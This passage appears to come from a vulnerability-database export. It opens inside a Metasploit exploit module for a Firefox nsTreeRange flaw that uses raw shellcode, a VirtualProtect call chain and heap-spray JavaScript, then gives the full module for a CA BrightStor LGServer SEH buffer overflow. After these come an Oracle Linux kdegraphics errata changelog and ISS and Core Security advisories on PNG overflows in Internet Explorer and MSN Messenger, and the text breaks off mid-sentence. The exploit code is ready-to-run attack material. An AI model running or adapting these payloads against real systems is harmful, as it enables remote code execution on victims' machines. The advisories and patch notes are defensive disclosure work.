0x10000, 0x40) # call VirtualProtect to make heap executable\n add_call.call(0xDEADBEEF, 0, 0, true) # call our shellcode\n\n callchain.flatten!\n callchain[-1] = base_offset + (callchain.length*4) # patch last offset to point to shellcode located after callchain\n\n esp_fix = 0x10\n\n payload_buf = callchain.pack('V*')\n\n payload_buf << \"\\xCC\" if datastore['SetBP']\n\n # make rest of shellcode run in separate thread\n if datastore['CreateThread'] and target['LLOffset'] and target['GPAOffset']\n payload_buf << \"\\x60\\x31\\xc0\\x50\\x50\\x50\\xe8\\x00\\x00\\x00\\x00\\x5a\\x89\\xd6\"\n payload_buf << \"\\x52\\x83\\x04\\x24\\x3b\\x83\\xc2\\x25\\x83\\xc6\\x2e\\x50\\x50\\x56\"\n payload_buf << \"\\x52\\xff\\x15#{[target['LLOffset']].pack('V')}\\x50\\xff\\x15#{[target['GPAOffset']].pack('V')}\"\n payload_buf << \"\\xff\\xd0\\x61\\xc2#{[esp_fix].pack('v')}\\x6b\\x65\\x72\\x6e\\x65\\x6c\\x33\\x32\"\n payload_buf << \"\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x54\\x68\\x72\\x65\\x61\\x64\\x00\"\n\n esp_fix = 0\n end\n\n # encapsulate actual payload in SEH handler\n if datastore['SEHProlog']\n payload_buf << \"\\x60\\xe8\\x00\\x00\\x00\\x00\\x83\\x04\\x24\\x1a\\x64\\xff\\x35\\x00\"\n payload_buf << \"\\x00\\x00\\x00\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x81\\xec\\x00\\x01\"\n payload_buf << \"\\x00\\x00\\xeb\\x12\\x8b\\x64\\x24\\x08\\x64\\x8f\\x05\\x00\\x00\\x00\"\n payload_buf << \"\\x00\\x83\\xc4\\x04\\x61\\xc2\"\n payload_buf << [esp_fix].pack('v')\n end\n\n payload_buf << p\n\n # controlled crash, to return to our SEH handler\n payload_buf << \"\\x33\\xC0\\xFF\\xE0\" if datastore['SEHProlog']\n\n payload_buf\n end\n\n def on_request_uri(cli, request)\n\n if request.uri == get_resource() or request.uri =~ /\\/$/\n print_status(\"Redirecting to .html URL\")\n redir = get_resource()\n redir << '/' if redir[-1,1] != '/'\n redir << rand_text_alphanumeric(4+rand(4))\n redir << '.html'\n send_redirect(cli, redir)\n\n elsif request.uri =~ /\\.html?$/\n print_status(\"Sending HTML\")\n xul_name \t= rand_text_alpha(rand(100)+1)\n j_applet \t= rand_text_alpha(rand(100)+1)\n\n html = <<-EOS\n<html>\n#{\"<applet codebase=\\\".\\\" code=\\\"#{j_applet}.class\\\" width=0 height=0></applet>\" if target['UsesJava']}\n<iframe src=\"#{xul_name}.xul\" width=\"1\" height=\"1\" frameborder=\"0\"></iframe>\n</html>\nEOS\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n\n elsif request.uri =~ /\\.xul$/\n print_status(\"Sending XUL\")\n\n js_file = rand_text_alpha(rand(100)+1)\n @js_func = rand_text_alpha(rand(32)+1)\n\n xul = <<-EOS\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/css\"?>\n<window xmlns:html=\"http://www.w3.org/1999/xhtml\" xmlns=\"http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" onload=\"#{@js_func}()\">\n<script src=\"#{js_file}.js\"/>\n<tree id=\"tr\">\n <treechildren>\n <treeitem>\n <treerow>\n <treecell label=\"\"/>\n </treerow>\n </treeitem>\n </treechildren>\n</tree>\n</window>\nEOS\n send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' })\n\n elsif request.uri =~ /\\.js$/\n print_status(\"Sending JS\")\n return if ((p = regenerate_payload(cli).encoded) == nil)\n\n base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1\n spray_size = datastore['SpraySize']\n spray_count = datastore['SprayCount']\n\n if not target['Auto']\n escaped_payload = Rex::Text.to_unescape(prepare_payload(target, p))\n shellcode_str = \"var shellcode = unescape(\\\"#{escaped_payload}\\\");\"\n else\n shellcode_str = target['Targets'].map{ |check, index|\n \"if (#{check}) {\\n var shellcode = unescape(\\\"#{Rex::Text.to_unescape(prepare_payload(targets[index], p))}\\\");\\n }\"}.join(' else ')\n shellcode_str << \" else { return; }\"\n end\n\n escaped_addr = Rex::Text.to_unescape([base_offset].pack(\"V\"))\n\n custom_js = <<-EOS\nfunction #{@js_func}() {\n\n container = new Array();\n\n #{shellcode_str}\n\n var delimiter = unescape(\"%udead\");\n\n var block = unescape(\"#{escaped_addr}\");\n while (block.length < 8)\n block += block;\n\n var treeSel = document.getElementById(\"tr\").view.selection;\n\n treeSel.clearSelection();\n\n for (var count = 0; count < 30; ++count)\n container.push(block + delimiter);\n\n treeSel.select(0);\n\n treeSel.tree = {\n invalidateRange: function(s,e) {\n\n treeSel.tree = null;\n treeSel.clearSelection();\n\n for (var count = 0; count < 10; ++count)\n container.push(block + delimiter);\n\n var big = unescape(\"%u4558%u4f52\");\n while (big.length < #{spray_size / 2})\n big += big;\n\n var pad = big.substring(0, #{(base_offset % spray_size)/2}) + shellcode;\n var spray = pad + big.substring(pad.length + 2);\n\n for (var count = 0; count < #{spray_count}; ++count)\n container.push(spray + delimiter);\n }\n }\n\n treeSel.invalidateSelection();\n}\nEOS\n\n if datastore['OBFUSCATE']\n opts = {\n 'Symbols' => {\n 'Variables' => %w{ shellcode container delimiter block treeSel big pad spray count }\n }\n }\n\n custom_js = obfuscate_js(custom_js,opts)\n end\n\n send_response(cli, custom_js, { 'Content-Type' => 'application/x-javascript' })\n end\n\n # Handle the payload\n handler(cli)\n end\nend\n\n=begin\n\nESI points to shellcode\n\nfinal call looks like this: CALL [[[[ESI]+8]]+70]\n[ESI+10], [ESI+C] and [[ESI]+8] are pushed as arguments\n[ESI+8] points to the next call frame, if there is one\n\n104924BC /$ 56 PUSH ESI\n104924BD |. 8B7424 08 MOV ESI,DWORD PTR SS:[ESP+8]\n104924C1 |> 8B06 /MOV EAX,DWORD PTR DS:[ESI]\n104924C3 |. 8B40 08 |MOV EAX,DWORD PTR DS:[EAX+8]\n104924C6 |. 85C0 |TEST EAX,EAX\n104924C8 |. 74 0C |JE SHORT xul.104924D6\n104924CA |. FF76 10 |PUSH DWORD PTR DS:[ESI+10]\n104924CD |. 8B08 |MOV ECX,DWORD PTR DS:[EAX]\n104924CF |. FF76 0C |PUSH DWORD PTR DS:[ESI+C]\n104924D2 |. 50 |PUSH EAX\n104924D3 |. FF51 70 |CALL DWORD PTR DS:[ECX+70] # does the calling for us\n104924D6 |> 8B76 08 |MOV ESI,DWORD PTR DS:[ESI+8]\n104924D9 |. 85F6 |TEST ESI,ESI\n104924DB |.^ 75 E4 \\JNZ SHORT xul.104924C1\n104924DD |. 5E POP ESI\n104924DE \\. C2 0400 RETN 4\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mozilla_nstreerange.rb"}, {"lastseen": "2019-08-31T09:40:18", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, an attacker could overflow the buffer and execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2010-11-04T22:19:26", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_MULTI", "href": "", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\n an attacker could overflow the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-3216' ],\n [ 'OSVDB', '35329' ],\n [ 'BID', '24348' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 SP4 English',\t{ 'Ret' => 0x75022ac4 } ],\n ],\n 'DisclosureDate' => 'Jun 6 2007',\n 'DefaultTarget' => 0))\n\n register_options([ Opt::RPORT(1900) ])\n end\n\n def check\n\n connect\n\n sock.put(\"0000000019rxrGetServerVersion\")\n ver = sock.get_once\n\n disconnect\n\n if ( ver and ver =~ /11\\.1\\.742/ )\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n connect\n\n rpc_commands = [\n \"rxsAddNewUser\",\n \"rxsSetUserInfo\",\n \"rxsRenameUser\",\n \"rxsExportData\",\n \"rxcReadSaveSetProfile\",\n \"rxcInitSaveSetProfile\",\n \"rxcAddSaveSetNextAppList\",\n \"rxcAddSaveSetNextFilesPathList\"\n ]\n\n rpc_command = rpc_commands[rand(rpc_commands.length)]\n\n data = rand_text_alpha_upper(62768)\n\n data[58468,8] = generate_seh_record(target.ret)\n data[58476,payload.encoded.length] = payload.encoded\n\n sploit = \"0000062768\"\t\t\t\t# Command Length Field\n sploit << rpc_command\t\t\t\t# RPC Command\n sploit << \"~~\"\t\t\t\t\t# Constant Argument Delimiter\n sploit << data\n\n print_status(\"Trying target #{target.name} with command '#{rpc_command}'...\")\n sock.put(sploit)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/lgserver_multi.rb"}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:20", "bulletinFamily": "unix", "description": "[7:3.3.1-3.9 ]\n- apply xpdf-splash-overflow-CVE-2006-0301-fix.diff to fix CVE-2006-0301 (#184307)\n[7:3.3.1-3.8]\n- apply xpdf-splash-overflow-CVE-2006-0301-fix.diff to fix CVE-2006-0301 (#179055)\n[7:3.3.1-3.7]\n- apply patch to fix buffer overflow issue in the xpdf codebase\n when handling splash images CVE-2006-0301 (#179055)\n[7:3.3.1-3.6]\n- better fix for CAN-2005-3193\n[7:3.3.1-3.5]\n- add BuildRequires: libieee1284-devel #168356\n- backport patch to fix CAN-2005-3193, #175105\n[7:3.3.1-3.4]\n- apply patch to fix kpdf DoS CAN-2005-2097, #163925\n[7:3.3.1-3.3]\n- More fixing of CAN-2004-0888 patch (bug #135393)\n[3.3.1-3.2]\n- Applied patch to fix CAN-2005-0064\n[7:3.3.1-3.1]\n- Applied patch to fix CAN-2004-1125\n[7:3.3.1-2]\n- fix kfax to use system libtiff\n[7:3.3.1-1]\n- update to 3.3.1\n[7:3.3.0-3]\n- fix typo in buildrequires #135007\n[7:3.3.0-2]\n- only show kcmkmrml in KDE\n- set variables before use\n[3.3.0-1]\n- update to 3.3.0\n[3.3.0-0.1.rc2]\n- update to 3.3.0 rc2\n[7:3.2.3-1]\n- update to 3.2.3\n[7:3.2.2-1]\n- update to 3.2.2\n[7:3.2.1-1]\n- 3.2.1 release\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[7:3.2.0-1.4]\n- fix typo bug, _smp_mflags instead smp_mflags\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[7:3.2.0-0.3]\n- 3.2.0 release\n- built against qt 3.3.0\n- add prereq /sbin/ldconfig\n[7:3.1.95-0.1]\n- KDE 3.2 RC1\n[7:3.1.94-0.1]\n- KDE 3.2 Beta2\n[7:3.1.93-0.2]\n- get rid of rpath\n[7:3.1.93-0.1]\n- KDE 3.2 Beta1\n- cleanup\n[7:3.1.4-1]\n- 3.1.4\n[7:3.1.3-4]\n- disable kpovmodeler temporary. waiting for freeglut\n[7:3.1.3-3]\n- fixed build problem with new gcc\n[7:3.1.3-2]\n- rebuilt\n[7:3.1.3-1]\n- 3.1.3\n[3.1.2-4]\n- disable kpovmodeler temporary. waiting for freeglut\n- built with gcc-3.3-12\n- remove excludearch s390/s390x\n[7:3.1.2-3.1]\n- added epoch for versioned requires where needed\n- built for RHEL\n* Wed Jun 04 2003 Elliot Lee \n- rebuilt\n[3.1.2-2]\n- 3.1.2\n[3.1.1-2]\n- PS/PDF file handling vulnerability\n[3.1.1-1]\n- 3.1.1\n* Mon Feb 24 2003 Elliot Lee \n- debuginfo rebuild\n[3.1-3]\n- get rid of gcc path from dependency_libs\n* Wed Feb 19 2003 Elliot Lee \n- BuildRequires: glut-devel if kpovmodeler\n[3.1-1]\n- 3.1 release\n- remove excludearch ia64\n- remove some unneeded macros\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[3.1-0.3]\n- rc6\n- exclude ia64\n[3.1-0.2]\n- fix desktop file issues\n- get rid of su packages\n[3.1-0.1]\n- update to 3.1 rc4\n[3.0.5-1]\n- update to 3.0.5\n[3.0.4-1]\n- 3.0.4\n* Sun Aug 25 2002 Florian La Roche \n- compile on mainframe\n* Wed Aug 14 2002 Florian La Roche \n- change spec file to work for more archs\n[3.0.3-1]\n- 3.0.3\n- build using gcc-3.2-0.3\n[3.0.2-4]\n- desktop files issues (bug #71018)\n[3.0.2-3]\n- build using gcc-3.2-0.1\n[3.0.2-2]\n- fix desktop files issue\n[3.0.2-1]\n- 3.0.2\n- use desktop-file-install\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated rebuild\n[3.0.1-1]\n- 3.0.1\n[3.0.0-5]\n- rename libraries\n[3.0.0-4]\n- Fix libkviewpart.* duplication (kview and kviewshell, #62749)\n- Shut up rpmlint\n[3.0.0-3]\n- Obsolete the old monolithic package\n- Fix build with gcc 3.1\n[3.0.0-2]\n- fix deps problem\n[3.0.0-1]\n- 3.0.0 final\n[3.0.0-0.cvs20020321.1]\n- Add docs for kooka and kuickshow and kfile PostScript plugin\n[3.0.0-0.cvs20020306.1]\n- Update\n- Rename subpackages\n- Dont build kamera on alpha\n[3.0.0-0.cvs20011226.1]\n- Update\n- Reorganize package\n[2.2-0.cvs20010726.1]\n- The -devel package has kscan-related files -n only. Since kscan isnt built\n on s390/s390x, dont build the devel package there.\n[2.2-0.cvs20010724.1]\n- Add more build dependencies (#48970)\n- Remove ia64 workarounds, no longer needed\n- Update\n[2.2-0.cvs20010723.1]\n- Restore -devel package, got lost during the update\n- Fix build on s390/s390x\n- Update\n[2.2-0.cvs20010722.2]\n- Make symlinks relative\n- Update\n* Wed Feb 21 2001 Bernhard Rosenkraenzer \n- 2.1-respin\n* Tue Feb 20 2001 Bernhard Rosenkraenzer \n- 2.1\n* Fri Feb 16 2001 Than Ngo \n- fix to build against glibc\n* Tue Feb 06 2001 Bernhard Rosenkraenzer \n- Get rid of libkdefakes.so.0 dependency\n* Mon Jan 22 2001 Bernhard Rosenkraenzer \n- Update\n* Mon Jan 01 2001 Bernhard Rosenkraenzer \n- Update\n* Wed Dec 20 2000 Bernhard Rosenkraenzer \n- Update\n- Stop excluding ia64\n* Wed Nov 15 2000 Bernhard Rosenkraenzer \n- Update to HEAD\n* Fri Nov 03 2000 Bernhard Rosenkraenzer \n- Update to KDE_2_0_BRANCH\n* Mon Oct 23 2000 Bernhard Rosenkraenzer \n- 2.0 final\n* Thu Aug 24 2000 Than Ngo \n- update to kdegraphics-1.93\n* Sun Aug 20 2000 Than Ngo \n- add missing kdegraphic2 package\n* Mon Aug 07 2000 Bernhard Rosenkraenzer \n- new version\n* Tue Jul 25 2000 Bernhard Rosenkraenzer \n- new snapshot\n- work around compiler bug by disabling kcoloredit for now, FIXME\n* Fri Jul 21 2000 Bernhard Rosenkraenzer \n- new snapshot\n- SMPify build\n* Sun Jul 16 2000 Than Ngo \n- use gcc 2.96\n- new snapshot\n- fix docdir\n* Fri Jun 23 2000 Bernhard Rosenkraenzer \n- Add Epoch - for some reason, rpm thinks 1.1.2 > 1.92.20000623.\n* Tue Jun 20 2000 Bernhard Rosenkraenzer \n- new snapshot\n- ExcludeArch ia64 for now\n* Sat Mar 18 2000 Bernhard Rosenkraenzer \n- new snapshot\n- move it to /usr, where it belongs\n* Sun Oct 24 1999 Bernhard Rosenkraenzer \n- Fix compilation\n* Fri Oct 22 1999 Bernhard Rosenkraenzer \n- 2.0 CVS\n* Fri Sep 24 1999 Preston Brown \n- mark doc files as such\n* Wed Sep 08 1999 Preston Brown \n- upgraded to 1.1.2 release\n* Fri Jun 11 1999 Preston Brown \n- snapshot, includes kde 1.1.1 + fixes\n* Mon Apr 19 1999 Preston Brown \n- last snapshot before release\n* Mon Apr 12 1999 Preston Brown \n- latest stable snapshot\n* Wed Feb 24 1999 Preston Brown \n- Injected new description and group.\n* Mon Feb 08 1999 Preston Brown \n- upgraded to KDE 1.1 final.\n* Sat Feb 06 1999 Preston Brown \n- updates to new libstdc++ and rpm standards.\n* Wed Jan 06 1999 Preston Brown \n- re-merged in updates from Duncan Haldane", "modified": "2006-11-30T00:00:00", "published": "2006-11-30T00:00:00", "id": "ELSA-2006-0262", "href": "http://linux.oracle.com/errata/ELSA-2006-0262.html", "title": "kdegraphics security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "Internet Security Systems Protection Advisory\r\nJune 14, 2005\r\n\r\nInternet Explorer PNG Overflow\r\n\r\nSummary:\r\n\r\nISS has shipped protection for a flaw X-Force has discovered in the PNG \r\nimage processing library used in software such as Microsoft's Internet \r\nExplorer web browser. By crafting a PNG file in a malicious manner, an \r\nattacker is able to trigger a heap overflow within Internet Explorer, \r\nleading to arbitrary code execution and remote compromise.\r\n\r\nISS Protection Strategy:\r\n\r\nISS has provided preemptive protection for these vulnerabilities. We \r\nrecommend that all customers apply applicable ISS product updates. \r\n\r\nNetwork Sensor 7.0, Proventia A and G100, G200, G1200:\r\nXPU 22.30 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nProventia M and G400, G2000:\r\nXPU 1.28 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nServer Sensor 7.0:\r\nXPU 22.30 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nProventia Desktop\r\nXPU 8.0.614.1\r\nImage_PNG_tRNS_BO\r\n\r\nDesktop Protector 7.0:\r\nVersion ENR / 9/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nBlackICE Agent for Server 3.6:\r\nVersion ENR / 9/25/04\r\nImage_PNG_tRNS_BO\r\n\r\n\r\nThese updates are now available from the ISS Download Center at:\r\nhttp://www.iss.net/download.\r\n\r\nBusiness Impact:\r\n\r\nCompromise of networks and machines using affected versions of Internet \r\nExplorer may lead to exposure of confidential information, loss of \r\nproductivity, and further network compromise. An attacker would be required \r\nto cause a user to view a malicious website or email containing a \r\nmaliciously crafted image. Successful exploitation would grant an attacker \r\nthe privileges of the user viewing the image, up to and including \r\nadministrative privileges. \r\n\r\nAffected Products:\r\n\r\nWindows 2000 up to and including SP4\r\nWindows XP up to and including SP2\r\nWindows Server 2003 up to and including SP1\r\n\r\nNote: Additional versions may be affected, please contact your \r\nvendor for confirmation.\r\n\r\nDescription:\r\n\r\nPortable Network Graphics (PNG) is a common and established image standard. \r\nThis image format is widely supported in applications that view images. \r\nMicrosoft's PNG filter library is a multi-purpose implementation of PNG \r\nrendering, and is used by applications such as Internet Explorer.\r\n\r\nMicrosoft's PNG filter library contains a buffer overflow vulnerability \r\nwhen processing maliciously-crafted PNG images. The library does not \r\ncorrectly handle a specific large PNG chunk, leading to heap corruption. \r\nExploitation of this buffer overflow can lead to remote compromise of \r\naffected machines with minimal user-interaction.\r\n\r\nWhile this library is used by Internet Explorer, it is likely that additional \r\napplications make use of this library and may be affected as well. In order \r\nto exploit this vulnerability through Internet Explorer, an attacker would be \r\nrequired to induce the victim to view a web page or email message containing \r\na maliciously-crafted PNG image.\r\n\r\nThe ISS X-Press Updates detailed above have the ability to protect \r\nagainst attack attempts targeted at Internet Explorer.\r\n\r\nAdditional Information:\r\n\r\nMicrosoft Security Bulletin:\r\nhttp://www.microsoft.com/technet/security/Bulletin/MS05-025.mspx\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the \r\nname CAN-2004-0597 to this issue. This is a candidate for inclusion in \r\nthe CVE list (http://cve.mitre.org), which standardizes names for \r\nsecurity problems.\r\n\r\nCredit:\r\n\r\nThis vulnerability was discovered and researched by Mark Dowd of the ISS \r\nX-Force.\r\n\r\n______\r\n\r\nAbout Internet Security Systems (ISS)\r\nInternet Security Systems, Inc. (ISS) is the trusted security expert to\r\nglobal enterprises and world governments, providing products and services\r\nthat protect against Internet threats. An established world leader\r\nin security since 1994, ISS delivers proven cost efficiencies and\r\nreduces regulatory and business risk across the enterprise for\r\nmore than 11,000 customers worldwide. ISS products and services\r\nare based on the proactive security intelligence conducted by ISS'\r\nX-Force┬\u043e research and development team \u0442\u0410\u0423 the unequivocal world\r\nauthority in vulnerability and threat research. Headquartered\r\nin Atlanta, Internet Security Systems has additional operations\r\nthroughout the Americas, Asia, Australia, Europe and the Middle East.\r\n\r\nCopyright (c) 2005 Internet Security Systems, Inc. All rights reserved\r\nworldwide.\r\n\r\nThis document is not to be edited or altered in any way without the\r\nexpress written consent of Internet Security Systems, Inc. If you wish\r\nto reprint the whole or any part of this document, please email\r\n\r\nxforce@iss.net for permission. You may provide links to this document\r\nfrom your web site, and you may make copies of this document in\r\naccordance with the fair use doctrine of the U.S. copyright laws. \r\n\r\nDisclaimer: The information within this document may change without notice.\r\nUse of this information constitutes acceptance for use in an AS IS\r\ncondition. There are NO warranties, implied or otherwise, with regard to\r\nthis information or its use. Any use of this information is at the\r\nuser's risk. In no event shall the author/distributor (Internet Security\r\nSystems X-Force) be held liable for any damages whatsoever arising out\r\nof or in connection with the use or spread of this information.\r\n\r\nX-Force PGP Key available on MIT's PGP key server and PGP.com's key\r\nserver, as well as at http://www.iss.net/security_center/sensitive.php\r\nPlease send suggestions, updates, and comments to: X-Force\r\n\r\nxforce@iss.net of Internet Security Systems, Inc.", "modified": "2005-06-15T00:00:00", "published": "2005-06-15T00:00:00", "id": "SECURITYVULNS:DOC:8854", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8854", "title": "Internet Explorer PNG Overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "\r\n Core Security Technologies Advisory\r\n http://www.coresecurity.com\r\n\r\n MSN Messenger PNG Image Parsing Vulnerability\r\n\r\n\r\n\r\nDate Published: 2005-02-08\r\n\r\nLast Update: 2005-02-08\r\n\r\nAdvisory ID: CORE-2004-0819\r\n\r\nBugtraq ID: None currently assigned.\r\n\r\nCVE Name: CAN-2004-0597\r\n\r\nTitle: MSN Messenger PNG Image Parsing Vulnerability\r\n\r\nClass: Boundary Error Condition (Stack Buffer Overflow)\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nAdvisory URL:\r\n http://www.coresecurity.com/common/showdoc.php?idx=421&idxseccion=10\r\n\r\nVendors contacted:\r\n- Microsoft\r\n 2004-08-23: Notification to vendor\r\n 2004-08-23: Notification acknowledgment received from vendor\r\n 2005-02-08: Publication of fixes and advisories\r\n\r\nRelease Mode: COORDINATED RELEASE\r\n\r\n\r\n*Vulnerability Description:*\r\n\r\n MSN Messenger is a fully featured Instant Messaging (IM) program,\r\n that allows users to exchange pictures using the PNG image format and\r\n display them during conversations.\r\n\r\n A vulnerability found in the parsing of PNG images could allow an\r\n attacker to execute arbitrary code in the chat partner's machine and\r\n gain access to the system with the privileges of the user running the\r\n MSN Messenger client program.\r\n\r\n This vulnerability can be exploited on Windows 2000 (all service\r\n packs) and Windows XP (all service packs) that run vulnerable\r\n clients of MSN Messenger.\r\n\r\n Due to the particular characteristics of the MSN Messenger\r\n communications protocol, exploitation of the vulnerability is likely\r\n to pass unnoticed to network Intrusion Detection Systems (IDS),\r\n Intrusion Prevention Systems (IPS) and firewalls that do not\r\n implement decoding and normalization of the MSN Messenger protocol\r\n encapsulated within HTTP. Furthermore, its is possible to craft\r\n exploit code to compromise vulnerable systems without crashing or\r\n disrupting the normal functioning of the MSN Messenger client\r\n application and thus passing unnoticed to the end-user as well.\r\n\r\n*Vulnerable Packages:*\r\n\r\n The vulnerability was discovered and researched on the following\r\n packages:\r\n\r\n. MSN Messenger 6.1 on Windows 2000 and Windows XP\r\n. MSN Messenger 6.2 on Windows 2000 and Windows XP\r\n\r\n The vendor reported the following packages as vulnerable:\r\n\r\n. MSN Messenger 6.1\r\n. MSN Messenger 6.2\r\n. Windows Messenger 4.7.2009\r\n. Windows Messenger 4.7.3000\r\n. Windows Messenger 5.0\r\n. Windows Media Player 9 series (CVE CAN-2004-1244)\r\n\r\n\r\n*Solution/Vendor Information/Workaround:*\r\n\r\n Microsoft Security Bulletin MS05-009 provides details and fix\r\n packages or vulnerable applications. It can be found at:\r\n\r\n http://www.microsoft.com/technet/security/bulletin/MS05-009.mspx\r\n\r\n The vendor reported that following packages/versions are NOT\r\n vulnerable:\r\n\r\n. Windows Media Player 6.4\r\n. Windows Media Player 7.1\r\n. Windows Media Player for Windows XP (8.0)\r\n. Windows Media Player 9 Series for Windows XP Service Pack 2\r\n. Windows Media Player 10\r\n. MSN Messenger for Mac\r\n\r\n Additionally, mitigating actions to reduce exposure to the\r\n vulnerability are provided below, but note that these actions might\r\n not suffice to close ALL attack vectors for ALL vulnerable packages:\r\n\r\n. MSN Messenger users should not accept unsolicited chat session\r\n requests from chat partners not in their contacts list.\r\n. MSN Messenger users should disable the custom emoticons feature of\r\n MSN Messenger, to do so go to Tools->Options->Messages.\r\n. Deny execution of MSN Messenger client application using ACLs or\r\n Host-based security controls.\r\n. Block MSN Messenger communications at the network perimeter.\r\n. Filter transmission of malformed PNG images using an\r\n application-layer proxy that supports MSN Messenger protocol.\r\n\r\n Disabling the "Display Picture" feature in MSN Messenger DOES NOT\r\n prevent exploitation.\r\n\r\n Core Security Technologies has made available a sample malformed\r\n PNG file that can be used to check if an MSN Messenger client is\r\n vulnerable.\r\n\r\n The ZIP-compressed image is available at\r\n\r\n http://www.coresecurity.com/corelabs/advisories/msn-vulncheck.zip\r\n\r\n After downloading it, uncompress and save it to a work folder, open\r\n MSN Messenger and select the image as your display picture in\r\n "Tools->Change Display Picture".\r\n\r\n Vulnerable clients will either crash or display popup dialog with the\r\n following text: "Your MSN Messenger client is vulnerable"\r\n\r\n\r\n*Credits:*\r\n\r\n This vulnerability was found by Juliano Rizzo from Core Security\r\n Technologies.\r\n\r\n Chris Evans discovered previous problems related to PNG images in\r\n the libPNG open source library [1][2].\r\n\r\n\r\n*Technical Description - Exploit/Concept Code:*\r\n\r\n This vulnerability was found in MSN Messenger 6.2.0137, all technical\r\n details apply to that package and version but may be applicable to\r\n other vulnerable versions as well.\r\n\r\n The MSN Messenger protocol supports transmission of several types of\r\n images between users that are displayed during conversations.\r\n These include:\r\n\r\n . The display picture, which usually is a picture of the user.\r\n . Custom icons that are small images shown in the message line.\r\n . Thumbnails of images being transferred.\r\n . Background images.\r\n\r\n The image format used is PNG [3]. When a user selects a picture to be\r\n displayed as avatar, Messenger converts it to PNG format with a fixed\r\n size and encoding characteristics. When a conversation is initiated\r\n with a contact, the image is transmitted over the same communication\r\n channel used to exchange text messages.\r\n By sending a specially crafted PNG image an attacker can trigger a\r\n buffer overflow and execute arbitrary code on the chat partner's\r\n system.\r\n\r\n The PNG file format structure is based on chunks as described in [3].\r\n The vulnerability is present in processing intentionally malformed\r\n image chunks with specially crafted values for some fields in the\r\n IHDR and tRNS chunk types.\r\n The IHDR chunk has a "color type" field: a single-byte integer that\r\n describes the interpretation of the image data. To trigger the bug,\r\n the flags "color used" and "palette used" have to be set in the color\r\n type field, whereas the "alpha channel used" flag must not be set.\r\n Thus, the color type value has to be set to 0x03. There must also\r\n exist a tRNS chunk with enough data length (>256) to overflow a\r\n buffer and reach a function pointer address. A PLTE chunk could exist\r\n in the file, but it has to be after the tRNS chunk.\r\n\r\n[MSN Messenger clients compiled with the /GS stack-overflow protection\r\nmechanism]\r\n\r\n Although the MSN Messenger client is compiled with the /GS compiler\r\n switch that provides protection against stack-based overflows as\r\n described in [4], exploitation is not prevented in this case.\r\n\r\n The following excerpt from MSDN describes the functionality of the\r\n /GS switch:\r\n\r\n "...The /GS switch provides a "speed bump" or cookie, between the\r\n buffer and the return address. If an overflow writes over the return\r\n address, it will have to overwrite the cookie put in between it and\r\n the buffer, resulting in a new stack layout..."\r\n\r\n The protection mechanism verifies the integrity of a called\r\n function's return address. By building a longer buffer, data beyond\r\n the return address can be overwritten, including: function\r\n parameters, local variables and Structured Exception Handling records\r\n [5]. Due to the way errors are handled in the MSN Messenger client,\r\n an exception is raised after the overflow occurs but before any\r\n stack integrity verification is done. To process that exception the\r\n first SEH record in the exception handlers chain is used and, since\r\n this is located in the stack and near the overflowed buffer, the\r\n most obvious method to execute arbitrary code bypassing 